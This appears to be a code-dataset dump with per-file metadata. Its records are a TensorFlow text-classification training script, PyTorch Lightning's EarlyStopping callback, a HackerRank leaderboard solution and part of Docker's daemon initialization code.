beta_1=training_args.adam_beta1,
beta_2=training_args.adam_beta2,
epsilon=training_args.adam_epsilon,
clipnorm=training_args.max_grad_norm,
)
if is_regression:
loss = tf.keras.losses.MeanSquaredError()
metrics = []
else:
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metrics = ["accuracy"]
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
# endregion
# region Dataset preprocessing
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
column_names = {col for cols in datasets.column_names.values() for col in cols}
non_label_column_names = [name for name in column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
elif "sentence1" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", None
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Ensure that our labels match the model's, if it has some pre-specified
if "train" in datasets:
if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
label_name_to_id = model.config.label2id
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = label_name_to_id # Use the model's labels
else:
                logger.warning(
                    "Your model seems to have been trained with labels, but they don't match the dataset: "
                    f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
                    "\nIgnoring the model labels as a result."
                )
label_to_id = {v: i for i, v in enumerate(label_list)}
elif not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
else:
label_to_id = None
# Now we've established our label2id, let's overwrite the model config with it.
model.config.label2id = label_to_id
if model.config.label2id is not None:
model.config.id2label = {id: label for label, id in label_to_id.items()}
else:
model.config.id2label = None
else:
label_to_id = model.config.label2id # Just load the data from the model
if "validation" in datasets and model.config.label2id is not None:
validation_label_list = datasets["validation"].unique("label")
for val_label in validation_label_list:
assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"
def preprocess_function(examples):
# Tokenize the texts
args = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
# Map labels to IDs
if model.config.label2id is not None and "label" in examples:
result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
return result
datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)
if "train" in datasets:
train_dataset = datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
# Log a few random samples from the training set so we can see that it's working as expected:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
if "validation" in datasets:
eval_dataset = datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
if "test" in datasets:
predict_dataset = datasets["test"]
if data_args.max_predict_samples is not None:
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
# endregion
# region Training
if "train" in datasets:
training_dataset = DataSequence(
train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
)
if "validation" in datasets:
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
else:
eval_dataset = None
callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
model.fit(
training_dataset,
validation_data=eval_dataset,
epochs=int(training_args.num_train_epochs),
callbacks=callbacks,
)
elif "validation" in datasets:
# If there's a validation dataset but no training set, just evaluate the metrics
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
logger.info("Computing metrics on validation data...")
if is_regression:
loss = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}")
else:
loss, accuracy = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
# endregion
# region Prediction
if "test" in datasets:
logger.info("Doing predictions on Predict dataset...")
predict_dataset = DataSequence(
            predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False, shuffle=False
)
predictions = model.predict(predict_dataset)["logits"]
predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
with open(output_predict_file, "w") as writer:
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if is_regression:
writer.write(f"{index}\t{item:3.3f}\n")
else:
item = model.config.id2label[item]
writer.write(f"{index}\t{item}\n")
logger.info(f"Wrote predictions to {output_predict_file}!")
# endregion
if __name__ == "__main__":
main()
|
[] |
[] |
[
"TF_CPP_MIN_LOG_LEVEL"
] |
[]
|
["TF_CPP_MIN_LOG_LEVEL"]
|
python
| 1 | 0 | |
pytorch_lightning/callbacks/early_stopping.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
Early Stopping
^^^^^^^^^^^^^^
Monitor a validation metric and stop training when it stops improving.
"""
from copy import deepcopy
import numpy as np
import torch
import torch.distributed as dist
from pytorch_lightning import _logger as log
from pytorch_lightning.callbacks.base import Callback
from pytorch_lightning.utilities import rank_zero_warn
import os
torch_inf = torch.tensor(np.Inf)
try:
import torch_xla
import torch_xla.core.xla_model as xm
except ImportError:
XLA_AVAILABLE = False
else:
XLA_AVAILABLE = True
class EarlyStopping(Callback):
r"""
Args:
monitor: quantity to be monitored. Default: ``'val_loss'``.
.. note:: Has no effect when using `EvalResult` or `TrainResult`
min_delta: minimum change in the monitored quantity
to qualify as an improvement, i.e. an absolute
change of less than `min_delta`, will count as no
improvement. Default: ``0.0``.
patience: number of validation epochs with no improvement
after which training will be stopped. Default: ``3``.
verbose: verbosity mode. Default: ``False``.
mode: one of {auto, min, max}. In `min` mode,
training will stop when the quantity
monitored has stopped decreasing; in `max`
mode it will stop when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity. Default: ``'auto'``.
strict: whether to crash the training if `monitor` is
not found in the validation metrics. Default: ``True``.
Example::
>>> from pytorch_lightning import Trainer
>>> from pytorch_lightning.callbacks import EarlyStopping
>>> early_stopping = EarlyStopping('val_loss')
>>> trainer = Trainer(early_stop_callback=early_stopping)
"""
mode_dict = {
'min': torch.lt,
'max': torch.gt,
}
def __init__(self, monitor: str = 'val_loss', min_delta: float = 0.0, patience: int = 3,
verbose: bool = False, mode: str = 'auto', strict: bool = True):
super().__init__()
self.monitor = monitor
self.patience = patience
self.verbose = verbose
self.strict = strict
self.min_delta = min_delta
self.wait_count = 0
self.stopped_epoch = 0
self.mode = mode
self.warned_result_obj = False
if mode not in self.mode_dict:
if self.verbose > 0:
log.info(f'EarlyStopping mode {mode} is unknown, fallback to auto mode.')
self.mode = 'auto'
if self.mode == 'auto':
if self.monitor == 'acc':
self.mode = 'max'
else:
self.mode = 'min'
if self.verbose > 0:
log.info(f'EarlyStopping mode set to {self.mode} for monitoring {self.monitor}.')
self.min_delta *= 1 if self.monitor_op == torch.gt else -1
self.best_score = torch_inf if self.monitor_op == torch.lt else -torch_inf
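        # Worked example (comment added for clarity; not in the original): with mode='min'
        # and min_delta=0.01, the line above flips min_delta to -0.01, so the later check
        # monitor_op(current - self.min_delta, self.best_score) becomes
        # torch.lt(current + 0.01, best_score); the monitored value must drop by more than
        # 0.01 below the best score seen so far to count as an improvement.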
def _validate_condition_metric(self, logs):
monitor_val = logs.get(self.monitor)
error_msg = (f'Early stopping conditioned on metric `{self.monitor}`'
f' which is not available. Either add `{self.monitor}` to the return of '
f' validation_epoch end or modify your EarlyStopping callback to use any of the '
f'following: `{"`, `".join(list(logs.keys()))}`')
if monitor_val is None:
if self.strict:
raise RuntimeError(error_msg)
if self.verbose > 0:
rank_zero_warn(error_msg, RuntimeWarning)
return False
return True
@property
def monitor_op(self):
return self.mode_dict[self.mode]
def state_dict(self):
return {
'wait_count': self.wait_count,
'stopped_epoch': self.stopped_epoch,
'best_score': self.best_score,
'patience': self.patience
}
def load_state_dict(self, state_dict):
state_dict = deepcopy(state_dict)
self.wait_count = state_dict['wait_count']
self.stopped_epoch = state_dict['stopped_epoch']
self.best_score = state_dict['best_score']
self.patience = state_dict['patience']
def on_validation_end(self, trainer, pl_module):
self._run_early_stopping_check(trainer, pl_module)
def on_validation_epoch_end(self, trainer, pl_module):
val_es_key = 'val_early_stop_on'
if trainer.callback_metrics.get(val_es_key) is not None:
self.monitor = val_es_key
# disable strict checking when using structured results
if val_es_key in trainer.callback_metrics:
self.strict = False
self._validate_condition_metric(trainer.callback_metrics)
def on_train_epoch_end(self, trainer, pl_module):
# disable early stopping in train loop when there's a val loop
if self.monitor == 'val_early_stop_on':
return
# early stopping can also work in the train loop when there is no val loop and when using structured results
should_check_early_stop = False
train_es_key = 'early_stop_on'
if trainer.callback_metrics.get(train_es_key, None) is not None:
self.monitor = train_es_key
should_check_early_stop = True
if should_check_early_stop:
self._run_early_stopping_check(trainer, pl_module)
def __warn_deprecated_monitor_key(self):
using_result_obj = os.environ.get('PL_USING_RESULT_OBJ', None)
        invalid_key = self.monitor not in ['val_loss', 'early_stop_on', 'val_early_stop_on', 'loss']
if using_result_obj and not self.warned_result_obj and invalid_key:
self.warned_result_obj = True
m = f"""
When using EvalResult(early_stop_on=X) or TrainResult(early_stop_on=X) the
'monitor' key of EarlyStopping has no effect.
                    Remove EarlyStopping(monitor='{self.monitor}') to fix.
"""
rank_zero_warn(m)
def _run_early_stopping_check(self, trainer, pl_module):
logs = trainer.callback_metrics
if not self._validate_condition_metric(logs):
return # short circuit if metric not present
self.__warn_deprecated_monitor_key()
current = logs.get(self.monitor)
# when in dev debugging
trainer.dev_debugger.track_early_stopping_history(current)
if not isinstance(current, torch.Tensor):
current = torch.tensor(current, device=pl_module.device)
if trainer.use_tpu and XLA_AVAILABLE:
current = current.cpu()
if self.monitor_op(current - self.min_delta, self.best_score):
self.best_score = current
self.wait_count = 0
else:
self.wait_count += 1
should_stop = self.wait_count >= self.patience
if bool(should_stop):
self.stopped_epoch = trainer.current_epoch
trainer.should_stop = True
# stop every ddp process if any world process decides to stop
self._stop_distributed_training(trainer, pl_module)
def _stop_distributed_training(self, trainer, pl_module):
# in ddp make sure all processes stop when one is flagged
if trainer.use_ddp or trainer.use_ddp2:
stop = torch.tensor(int(trainer.should_stop), device=pl_module.device)
            dist.all_reduce(stop, op=dist.ReduceOp.SUM)
dist.barrier()
trainer.should_stop = stop == trainer.world_size
if trainer.use_tpu:
stop = torch.tensor(int(trainer.should_stop), device=pl_module.device, dtype=torch.int32)
stop = xm.mesh_reduce("stop_signal", stop, torch.cat)
torch_xla.core.xla_model.rendezvous("pl.EarlyStoppingCallback.stop_distributed_training_check")
trainer.should_stop = int(stop.item()) == trainer.world_size
def on_train_end(self, trainer, pl_module):
if self.stopped_epoch > 0 and self.verbose > 0:
rank_zero_warn('Displayed epoch numbers by `EarlyStopping` start from "1" until v0.6.x,'
' but will start from "0" in v0.8.0.', DeprecationWarning)
log.info(f'Epoch {self.stopped_epoch + 1:05d}: early stopping triggered.')
|
[] |
[] |
[
"PL_USING_RESULT_OBJ"
] |
[]
|
["PL_USING_RESULT_OBJ"]
|
python
| 1 | 0 | |
problem-solving/climbing-the-leaderboard.py
|
# https://www.hackerrank.com/challenges/climbing-the-leaderboard/problem
import math
import os
import random
import re
import sys
import copy
#
# Complete the 'climbingLeaderboard' function below.
#
# The function is expected to return an INTEGER_ARRAY.
# The function accepts following parameters:
# 1. INTEGER_ARRAY ranked
# 2. INTEGER_ARRAY player
#
def climbingLeaderboard(ranked, player):
ranked = list(set(ranked))
ranked.sort(reverse=True)
ranked.append(0)
player.reverse()
    out = []
    j = 0
    for i in range(len(ranked)):
        if j == len(player):
            break
        while player[j] >= ranked[i]:
            out.append(i + 1)
            j += 1
            if j == len(player):
                break
out.reverse()
return out
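# Worked example (comment added for clarity, not part of the original solution):
#   ranked = [100, 90, 90, 80], player = [70, 80, 105]
#   dedup + sort desc + sentinel -> [100, 90, 80, 0]
#   player scores (processed highest first) land at ranks 1, 3 and 4,
#   so the function returns [4, 3, 1] in the original player order.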
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
ranked_count = int(input().strip())
ranked = list(map(int, input().rstrip().split()))
player_count = int(input().strip())
player = list(map(int, input().rstrip().split()))
result = climbingLeaderboard(ranked, player)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
|
[] |
[] |
[
"OUTPUT_PATH"
] |
[]
|
["OUTPUT_PATH"]
|
python
| 1 | 0 | |
vendor/github.com/docker/docker/daemon/daemon.go
|
// Package daemon exposes the functions that occur on the host server
// that the Docker daemon is running.
//
// In implementing the various functions of the daemon, there is often
// a method-specific struct for configuring the runtime behavior.
package daemon
import (
"fmt"
"io/ioutil"
"net"
"os"
"path"
"path/filepath"
"runtime"
"strings"
"sync"
"time"
"github.com/Sirupsen/logrus"
containerd "github.com/docker/containerd/api/grpc/types"
"github.com/docker/docker/api"
"github.com/docker/docker/api/types"
containertypes "github.com/docker/docker/api/types/container"
"github.com/docker/docker/container"
"github.com/docker/docker/daemon/config"
"github.com/docker/docker/daemon/discovery"
"github.com/docker/docker/daemon/events"
"github.com/docker/docker/daemon/exec"
"github.com/docker/docker/daemon/logger"
// register graph drivers
_ "github.com/docker/docker/daemon/graphdriver/register"
"github.com/docker/docker/daemon/initlayer"
"github.com/docker/docker/daemon/stats"
dmetadata "github.com/docker/docker/distribution/metadata"
"github.com/docker/docker/distribution/xfer"
"github.com/docker/docker/dockerversion"
"github.com/docker/docker/image"
"github.com/docker/docker/layer"
"github.com/docker/docker/libcontainerd"
"github.com/docker/docker/migrate/v1"
"github.com/docker/docker/pkg/fileutils"
"github.com/docker/docker/pkg/idtools"
"github.com/docker/docker/pkg/plugingetter"
"github.com/docker/docker/pkg/registrar"
"github.com/docker/docker/pkg/signal"
"github.com/docker/docker/pkg/sysinfo"
"github.com/docker/docker/pkg/system"
"github.com/docker/docker/pkg/truncindex"
"github.com/docker/docker/plugin"
refstore "github.com/docker/docker/reference"
"github.com/docker/docker/registry"
"github.com/docker/docker/runconfig"
volumedrivers "github.com/docker/docker/volume/drivers"
"github.com/docker/docker/volume/local"
"github.com/docker/docker/volume/store"
"github.com/docker/libnetwork"
"github.com/docker/libnetwork/cluster"
nwconfig "github.com/docker/libnetwork/config"
"github.com/docker/libtrust"
"github.com/pkg/errors"
)
var (
// DefaultRuntimeBinary is the default runtime to be used by
// containerd if none is specified
DefaultRuntimeBinary = "docker-runc"
errSystemNotSupported = errors.New("The Docker daemon is not supported on this platform.")
)
// Daemon holds information about the Docker daemon.
type Daemon struct {
ID string
repository string
containers container.Store
execCommands *exec.Store
referenceStore refstore.Store
downloadManager *xfer.LayerDownloadManager
uploadManager *xfer.LayerUploadManager
distributionMetadataStore dmetadata.Store
trustKey libtrust.PrivateKey
idIndex *truncindex.TruncIndex
configStore *config.Config
statsCollector *stats.Collector
defaultLogConfig containertypes.LogConfig
RegistryService registry.Service
EventsService *events.Events
netController libnetwork.NetworkController
volumes *store.VolumeStore
discoveryWatcher discovery.Reloader
root string
seccompEnabled bool
apparmorEnabled bool
shutdown bool
uidMaps []idtools.IDMap
gidMaps []idtools.IDMap
layerStore layer.Store
imageStore image.Store
PluginStore *plugin.Store // todo: remove
pluginManager *plugin.Manager
nameIndex *registrar.Registrar
linkIndex *linkIndex
containerd libcontainerd.Client
containerdRemote libcontainerd.Remote
defaultIsolation containertypes.Isolation // Default isolation mode on Windows
clusterProvider cluster.Provider
cluster Cluster
machineMemory uint64
seccompProfile []byte
seccompProfilePath string
}
// HasExperimental returns whether the experimental features of the daemon are enabled or not
func (daemon *Daemon) HasExperimental() bool {
if daemon.configStore != nil && daemon.configStore.Experimental {
return true
}
return false
}
func (daemon *Daemon) restore() error {
var (
currentDriver = daemon.GraphDriverName()
containers = make(map[string]*container.Container)
)
logrus.Info("Loading containers: start.")
dir, err := ioutil.ReadDir(daemon.repository)
if err != nil {
return err
}
for _, v := range dir {
id := v.Name()
container, err := daemon.load(id)
if err != nil {
logrus.Errorf("Failed to load container %v: %v", id, err)
continue
}
// Ignore the container if it does not support the current driver being used by the graph
if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver {
rwlayer, err := daemon.layerStore.GetRWLayer(container.ID)
if err != nil {
logrus.Errorf("Failed to load container mount %v: %v", id, err)
continue
}
container.RWLayer = rwlayer
logrus.Debugf("Loaded container %v", container.ID)
containers[container.ID] = container
} else {
logrus.Debugf("Cannot load container %s because it was created with another graph driver.", container.ID)
}
}
removeContainers := make(map[string]*container.Container)
restartContainers := make(map[*container.Container]chan struct{})
activeSandboxes := make(map[string]interface{})
for id, c := range containers {
if err := daemon.registerName(c); err != nil {
logrus.Errorf("Failed to register container %s: %s", c.ID, err)
delete(containers, id)
continue
}
daemon.Register(c)
		// verify that all volumes are valid and have been migrated from the pre-1.7 layout
if err := daemon.verifyVolumesInfo(c); err != nil {
// don't skip the container due to error
logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err)
}
// The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver.
// We should rewrite it to use the daemon defaults.
// Fixes https://github.com/docker/docker/issues/22536
if c.HostConfig.LogConfig.Type == "" {
if err := daemon.mergeAndVerifyLogConfig(&c.HostConfig.LogConfig); err != nil {
logrus.Errorf("Failed to verify log config for container %s: %q", c.ID, err)
continue
}
}
}
var wg sync.WaitGroup
var mapLock sync.Mutex
for _, c := range containers {
wg.Add(1)
go func(c *container.Container) {
defer wg.Done()
if err := backportMountSpec(c); err != nil {
logrus.Error("Failed to migrate old mounts to use new spec format")
}
if c.IsRunning() || c.IsPaused() {
c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking
if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil {
logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err)
return
}
// we call Mount and then Unmount to get BaseFs of the container
if err := daemon.Mount(c); err != nil {
// The mount is unlikely to fail. However, in case mount fails
// the container should be allowed to restore here. Some functionalities
// (like docker exec -u user) might be missing but container is able to be
// stopped/restarted/removed.
// See #29365 for related information.
// The error is only logged here.
logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err)
} else {
// if mount success, then unmount it
if err := daemon.Unmount(c); err != nil {
logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err)
}
}
c.ResetRestartManager(false)
if !c.HostConfig.NetworkMode.IsContainer() && c.IsRunning() {
options, err := daemon.buildSandboxOptions(c)
if err != nil {
logrus.Warnf("Failed build sandbox option to restore container %s: %v", c.ID, err)
}
mapLock.Lock()
activeSandboxes[c.NetworkSettings.SandboxID] = options
mapLock.Unlock()
}
}
// fixme: only if not running
// get list of containers we need to restart
if !c.IsRunning() && !c.IsPaused() {
				// Do not autostart containers that
				// have endpoints in a swarm-scope
				// network yet, since the cluster is
				// not initialized yet. We will start
				// them after the cluster is
				// initialized.
if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint {
mapLock.Lock()
restartContainers[c] = make(chan struct{})
mapLock.Unlock()
} else if c.HostConfig != nil && c.HostConfig.AutoRemove {
mapLock.Lock()
removeContainers[c.ID] = c
mapLock.Unlock()
}
}
if c.RemovalInProgress {
// We probably crashed in the middle of a removal, reset
// the flag.
//
// We DO NOT remove the container here as we do not
// know if the user had requested for either the
// associated volumes, network links or both to also
// be removed. So we put the container in the "dead"
// state and leave further processing up to them.
logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID)
c.ResetRemovalInProgress()
c.SetDead()
c.ToDisk()
}
}(c)
}
wg.Wait()
daemon.netController, err = daemon.initNetworkController(daemon.configStore, activeSandboxes)
if err != nil {
return fmt.Errorf("Error initializing network controller: %v", err)
}
// Now that all the containers are registered, register the links
for _, c := range containers {
if err := daemon.registerLinks(c, c.HostConfig); err != nil {
logrus.Errorf("failed to register link for container %s: %v", c.ID, err)
}
}
group := sync.WaitGroup{}
for c, notifier := range restartContainers {
group.Add(1)
go func(c *container.Container, chNotify chan struct{}) {
defer group.Done()
logrus.Debugf("Starting container %s", c.ID)
// ignore errors here as this is a best effort to wait for children to be
// running before we try to start the container
children := daemon.children(c)
timeout := time.After(5 * time.Second)
for _, child := range children {
if notifier, exists := restartContainers[child]; exists {
select {
case <-notifier:
case <-timeout:
}
}
}
// Make sure networks are available before starting
daemon.waitForNetworks(c)
if err := daemon.containerStart(c, "", "", true); err != nil {
logrus.Errorf("Failed to start container %s: %s", c.ID, err)
}
close(chNotify)
}(c, notifier)
}
group.Wait()
removeGroup := sync.WaitGroup{}
for id := range removeContainers {
removeGroup.Add(1)
go func(cid string) {
if err := daemon.ContainerRm(cid, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
logrus.Errorf("Failed to remove container %s: %s", cid, err)
}
removeGroup.Done()
}(id)
}
removeGroup.Wait()
// any containers that were started above would already have had this done,
// however we need to now prepare the mountpoints for the rest of the containers as well.
// This shouldn't cause any issue running on the containers that already had this run.
// This must be run after any containers with a restart policy so that containerized plugins
// can have a chance to be running before we try to initialize them.
for _, c := range containers {
// if the container has restart policy, do not
// prepare the mountpoints since it has been done on restarting.
// This is to speed up the daemon start when a restart container
// has a volume and the volume driver is not available.
if _, ok := restartContainers[c]; ok {
continue
} else if _, ok := removeContainers[c.ID]; ok {
// container is automatically removed, skip it.
continue
}
group.Add(1)
go func(c *container.Container) {
defer group.Done()
if err := daemon.prepareMountPoints(c); err != nil {
logrus.Error(err)
}
}(c)
}
group.Wait()
logrus.Info("Loading containers: done.")
return nil
}
// RestartSwarmContainers restarts any autostart container which has a
// swarm endpoint.
func (daemon *Daemon) RestartSwarmContainers() {
group := sync.WaitGroup{}
for _, c := range daemon.List() {
if !c.IsRunning() && !c.IsPaused() {
			// Autostart all the containers that have a
			// swarm endpoint, now that the cluster is
			// initialized.
if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint {
group.Add(1)
go func(c *container.Container) {
defer group.Done()
if err := daemon.containerStart(c, "", "", true); err != nil {
logrus.Error(err)
}
}(c)
}
}
}
group.Wait()
}
// waitForNetworks is used during daemon initialization when starting up containers
// It ensures that all of a container's networks are available before the daemon tries to start the container.
// In practice it just makes sure the discovery service is available for containers which use a network that require discovery.
func (daemon *Daemon) waitForNetworks(c *container.Container) {
if daemon.discoveryWatcher == nil {
return
}
// Make sure if the container has a network that requires discovery that the discovery service is available before starting
for netName := range c.NetworkSettings.Networks {
// If we get `ErrNoSuchNetwork` here, we can assume that it is due to discovery not being ready
// Most likely this is because the K/V store used for discovery is in a container and needs to be started
if _, err := daemon.netController.NetworkByName(netName); err != nil {
if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok {
continue
}
// use a longish timeout here due to some slowdowns in libnetwork if the k/v store is on anything other than --net=host
// FIXME: why is this slow???
logrus.Debugf("Container %s waiting for network to be ready", c.Name)
select {
case <-daemon.discoveryWatcher.ReadyCh():
case <-time.After(60 * time.Second):
}
return
}
}
}
func (daemon *Daemon) children(c *container.Container) map[string]*container.Container {
return daemon.linkIndex.children(c)
}
// parents returns the names of the parent containers of the container
// with the given name.
func (daemon *Daemon) parents(c *container.Container) map[string]*container.Container {
return daemon.linkIndex.parents(c)
}
func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error {
fullName := path.Join(parent.Name, alias)
if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil {
if err == registrar.ErrNameReserved {
logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err)
return nil
}
return err
}
daemon.linkIndex.link(parent, child, fullName)
return nil
}
// DaemonJoinsCluster informs the daemon that it has joined the cluster and provides
// the handler to query the cluster component
func (daemon *Daemon) DaemonJoinsCluster(clusterProvider cluster.Provider) {
daemon.setClusterProvider(clusterProvider)
}
// DaemonLeavesCluster informs the daemon that it has left the cluster
func (daemon *Daemon) DaemonLeavesCluster() {
// Daemon is in charge of removing the attachable networks with
// connected containers when the node leaves the swarm
daemon.clearAttachableNetworks()
// We no longer need the cluster provider, stop it now so that
// the network agent will stop listening to cluster events.
daemon.setClusterProvider(nil)
// Wait for the networking cluster agent to stop
daemon.netController.AgentStopWait()
// Daemon is in charge of removing the ingress network when the
// node leaves the swarm. Wait for job to be done or timeout.
// This is called also on graceful daemon shutdown. We need to
// wait, because the ingress release has to happen before the
// network controller is stopped.
if done, err := daemon.ReleaseIngress(); err == nil {
select {
case <-done:
case <-time.After(5 * time.Second):
logrus.Warnf("timeout while waiting for ingress network removal")
}
} else {
logrus.Warnf("failed to initiate ingress network removal: %v", err)
}
}
// setClusterProvider sets a component for querying the current cluster state.
func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) {
daemon.clusterProvider = clusterProvider
daemon.netController.SetClusterProvider(clusterProvider)
}
// IsSwarmCompatible verifies if the current daemon
// configuration is compatible with the swarm mode
func (daemon *Daemon) IsSwarmCompatible() error {
if daemon.configStore == nil {
return nil
}
return daemon.configStore.IsSwarmCompatible()
}
// NewDaemon sets up everything for the daemon to be able to service
// requests from the webserver.
func NewDaemon(config *config.Config, registryService registry.Service, containerdRemote libcontainerd.Remote, pluginStore *plugin.Store) (daemon *Daemon, err error) {
setDefaultMtu(config)
// Ensure that we have a correct root key limit for launching containers.
if err := ModifyRootKeyLimit(); err != nil {
logrus.Warnf("unable to modify root key limit, number of containers could be limited by this quota: %v", err)
}
// Ensure we have compatible and valid configuration options
if err := verifyDaemonSettings(config); err != nil {
return nil, err
}
// Do we have a disabled network?
config.DisableBridge = isBridgeNetworkDisabled(config)
// Verify the platform is supported as a daemon
if !platformSupported {
return nil, errSystemNotSupported
}
// Validate platform-specific requirements
if err := checkSystem(); err != nil {
return nil, err
}
uidMaps, gidMaps, err := setupRemappedRoot(config)
if err != nil {
return nil, err
}
rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
if err != nil {
return nil, err
}
if err := setupDaemonProcess(config); err != nil {
return nil, err
}
// set up the tmpDir to use a canonical path
tmp, err := prepareTempDir(config.Root, rootUID, rootGID)
if err != nil {
return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err)
}
realTmp, err := fileutils.ReadSymlinkedDirectory(tmp)
if err != nil {
return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err)
}
os.Setenv("TMPDIR", realTmp)
d := &Daemon{configStore: config}
// Ensure the daemon is properly shutdown if there is a failure during
// initialization
defer func() {
if err != nil {
if err := d.Shutdown(); err != nil {
logrus.Error(err)
}
}
}()
// set up SIGUSR1 handler on Unix-like systems, or a Win32 global event
// on Windows to dump Go routine stacks
stackDumpDir := config.Root
if execRoot := config.GetExecRoot(); execRoot != "" {
stackDumpDir = execRoot
}
d.setupDumpStackTrap(stackDumpDir)
if err := d.setupSeccompProfile(); err != nil {
return nil, err
}
// Set the default isolation mode (only applicable on Windows)
if err := d.setDefaultIsolation(); err != nil {
return nil, fmt.Errorf("error setting default isolation mode: %v", err)
}
logrus.Debugf("Using default logging driver %s", config.LogConfig.Type)
if err := configureMaxThreads(config); err != nil {
logrus.Warnf("Failed to configure golang's threads limit: %v", err)
}
if err := ensureDefaultAppArmorProfile(); err != nil {
logrus.Errorf(err.Error())
}
daemonRepo := filepath.Join(config.Root, "containers")
if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
return nil, err
}
if runtime.GOOS == "windows" {
if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) {
return nil, err
}
}
driverName := os.Getenv("DOCKER_DRIVER")
if driverName == "" {
driverName = config.GraphDriver
}
d.RegistryService = registryService
d.PluginStore = pluginStore
logger.RegisterPluginGetter(d.PluginStore)
// Plugin system initialization should happen before restore. Do not change order.
d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{
Root: filepath.Join(config.Root, "plugins"),
ExecRoot: getPluginExecRoot(config.Root),
Store: d.PluginStore,
Executor: containerdRemote,
RegistryService: registryService,
LiveRestoreEnabled: config.LiveRestoreEnabled,
LogPluginEvent: d.LogPluginEvent, // todo: make private
AuthzMiddleware: config.AuthzMiddleware,
})
if err != nil {
return nil, errors.Wrap(err, "couldn't create plugin manager")
}
d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{
StorePath: config.Root,
MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"),
GraphDriver: driverName,
GraphDriverOptions: config.GraphOptions,
UIDMaps: uidMaps,
GIDMaps: gidMaps,
PluginGetter: d.PluginStore,
ExperimentalEnabled: config.Experimental,
})
if err != nil {
return nil, err
}
graphDriver := d.layerStore.DriverName()
imageRoot := filepath.Join(config.Root, "image", graphDriver)
// Configure and validate the kernel's security support
